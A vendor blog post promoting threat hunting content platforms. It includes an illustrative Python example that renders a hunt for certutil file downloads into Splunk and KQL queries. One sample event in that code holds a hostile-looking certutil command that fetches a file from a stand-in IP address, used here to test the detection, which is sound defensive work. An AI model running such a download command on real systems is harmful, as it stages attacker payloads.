Making the Case for Threat Hunting Content Platforms

Nov 18, 2021 (4 min read)


By Josh Campbell at Cyborg Security

Threat hunters are often some of the busiest people in a SOC. One day they may be researching new attack methodologies, the next they may be leading a hunt across the environment, and the day after they may be sifting through gigabytes of log data. For threat hunters, then, time is of the essence, and saving it is key. One of the biggest time sinks for a threat hunter is developing a hypothesis and then engineering a detection strategy that can validate or falsify it. This is where threat hunting content platforms can help.

How Threat Hunting Content Platforms Help

Most hunting teams can only run a handful of hunts each month because building a threat hunting package from scratch takes so long. With a content platform, a team can dramatically shorten the mean time to deployment (MTTDp) of a hunt, and so run more hunts, faster, without sacrificing efficacy or burdening itself with false positives.

What are Threat Hunting Content Platforms?

If you haven’t heard of a threat hunting content platform before, you might be wondering what they are.

These platforms provide threat hunters a wealth of highly vetted, constantly updated, behaviorally based threat hunting content to allow them to hunt for the latest adversary tactics, techniques, tools, and exploits. This means that threat hunters can quickly identify and deploy hunts relevant to their organizations, without having to spend days or weeks performing the research.

These platforms also deliver that content pre-tailored to an organization’s unique environment. No time is spent developing or re-engineering the content and queries for a different tool or configuration; the platform does that automatically.

These platforms aren’t a one-trick pony, either. They also supply much of the material used to develop the hunt plan, including runbooks, research, mitigation strategies, and even ongoing threat intelligence. The result is that hunters spend less time on the “busy work” of the pre-hunt and more of their time actually hunting.

But threat hunting content platforms also offer organizations other significant benefits, including:

More and faster hunts.

It can take weeks to research, build, validate, and contextualize a hunt. A content platform provides instant access to hunting packages built by an expert team — with new packages available within hours or days of a threat surfacing.

No query customization required.

Content packages include queries pre-configured for the hunter’s environment and tool stack. This significantly decreases the mean time to deployment (MTTDp) for security teams.

Minimizes manual analysis time.

Quality packages return a manageable number of results with few false positives, meaning that hunters don’t have to wade through meaningless results.

Easily searchable.

Packages are enriched with relevant context and tagged with alternate names for threats and groups, making it easy for hunters to identify content that fits their needs.

Guides threat hunting.

The packages provided by a content platform are based on current TTPs, high-fidelity CTI, and adversary behaviors. Threat hunters can analyze the latest packages to see which threats currently focus on their industry or location and run those hunts.

Guides data collection.

Threat hunters aren’t always logging experts and don’t always know what data is available. Top-tier content states which logs a hunt needs, which helps hunters understand what their organization should be collecting and make the case for change if they don’t have it.

Informs ongoing monitoring.

Once a threat hunt has run successfully, it may be suitable to operationalize as an automated detection. Not all content is suitable, but content linked to specific TTPs can often inform ongoing monitoring.

Aids threat hunter development.

With access to high-quality content, threat hunters can develop their skills and understanding by studying how expert hunters research and build a hunt.

Helps to upskill aspiring threat hunters.

To fill the skills gap, many organizations aim to upskill top performers from other security disciplines. Access to packages developed by expert threat hunters helps aspiring hunters develop their skills.

Much lower cost than hiring more FTEs.

Hiring more threat hunters can cost hundreds of thousands of dollars. A content platform can help a threat hunting team dramatically increase productivity, often for less than the cost of a single FTE.
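To make two of the points above concrete, “no query customization required” and “guides data collection”, here is an added example of what a tool-agnostic hunt package can look like and how it is rendered for different tool stacks. This is illustrative code written for this article, not Cyborg Security’s package format or any real platform’s output: the package schema, the two environments, the field mappings and the sample events are all constructed, and the Splunk and KQL rendering is deliberately simplified. The same generic logic is rendered into each environment’s query dialect, checked for the log sources it needs, and evaluated directly against a handful of normalized events.

```python
"""Hypothetical hunt package rendered into two query dialects.

Constructed example for illustration: schema, environments, field mappings
and sample events are assumptions, not any vendor's real format.
"""
from dataclasses import dataclass

# A behaviour-based hunt package, independent of any tool. The selection is a
# list of (generic_field, operator, value); operators are "endswith"/"contains".
HUNT_PACKAGE = {
    "name": "certutil used to download a file",
    "technique": "T1105",
    "log_source": ("windows", "process_creation"),
    "selection": [
        ("process_path", "endswith", "\\certutil.exe"),
        ("command_line", "contains", "urlcache"),
    ],
}


@dataclass
class Environment:
    """One organisation's tool stack (constructed)."""
    name: str
    backend: str          # "splunk" or "kql"
    fields: dict          # generic field -> backend field name
    source_prefix: dict   # (product, category) -> query scope for that source
    collected: set        # log sources the organisation actually ingests


ENV_SPLUNK = Environment(
    name="corp-splunk", backend="splunk",
    fields={"process_path": "Image", "command_line": "CommandLine"},
    source_prefix={("windows", "process_creation"): "index=wineventlog EventCode=1"},
    collected={("windows", "process_creation"), ("windows", "security")},
)

ENV_ELASTIC = Environment(
    name="corp-elastic", backend="kql",
    fields={"process_path": "process.executable", "command_line": "process.command_line"},
    source_prefix={("windows", "process_creation"): "event.category:process and event.type:start"},
    collected={("windows", "security")},  # process creation not yet ingested
)


def _splunk_term(field, op, value):
    # Simplified SPL: quoted value with leading/trailing wildcards.
    esc = value.replace("\\", "\\\\").replace('"', '\\"')
    return f'{field}="*{esc}"' if op == "endswith" else f'{field}="*{esc}*"'


def _kql_term(field, op, value):
    # Simplified KQL: unquoted value, backslashes escaped, wildcards added.
    esc = value.replace("\\", "\\\\")
    return f"{field}:*{esc}" if op == "endswith" else f"{field}:*{esc}*"


def render(package, env):
    """Render the package's generic logic into env's query dialect."""
    scope = env.source_prefix[package["log_source"]]
    term, joiner = (_splunk_term, " ") if env.backend == "splunk" else (_kql_term, " and ")
    terms = [term(env.fields[g], op, v) for g, op, v in package["selection"]]
    return scope + joiner + joiner.join(terms)


def missing_log_sources(package, env):
    """Log sources the hunt needs that env does not collect: the case for change."""
    return sorted({package["log_source"]} - env.collected)


def matches(package, event):
    """Evaluate the generic logic against one normalised event (case-insensitive)."""
    for g, op, v in package["selection"]:
        val = event.get(g, "").lower()
        if op == "endswith" and not val.endswith(v.lower()):
            return False
        if op == "contains" and v.lower() not in val:
            return False
    return True


def hits(package, events):
    return [e for e in events if matches(package, e)]


# Constructed events, already normalised to the package's generic field names.
SAMPLE_EVENTS = [
    {"process_path": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"},
    {"process_path": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil.exe -verify cert.cer"},
    {"process_path": "C:\\Windows\\System32\\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for env in (ENV_SPLUNK, ENV_ELASTIC):
        print(env.name, "->", render(HUNT_PACKAGE, env))
        print("  missing log sources:", missing_log_sources(HUNT_PACKAGE, env))
    print("sample hits:", len(hits(HUNT_PACKAGE, SAMPLE_EVENTS)))
```

The point of the split is that the hunt’s logic and its required log source are written once; only the thin rendering layer knows about field names and dialects. For the Elastic environment the function reports that Windows process creation events are not collected at all, which is exactly the data-collection gap a hunter would otherwise discover only after an empty search.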

Wrapping Up

As threat hunting continues to grow in popularity within the information security community, it is imperative that organizations build scalable hunting strategies. This means ensuring their threat hunters’ time is used effectively and efficiently. Threat hunting content platforms enable this, allowing threat hunters to deploy new hunts in hours instead of days or weeks. This also means that security teams can respond to new threats quickly and with confidence.

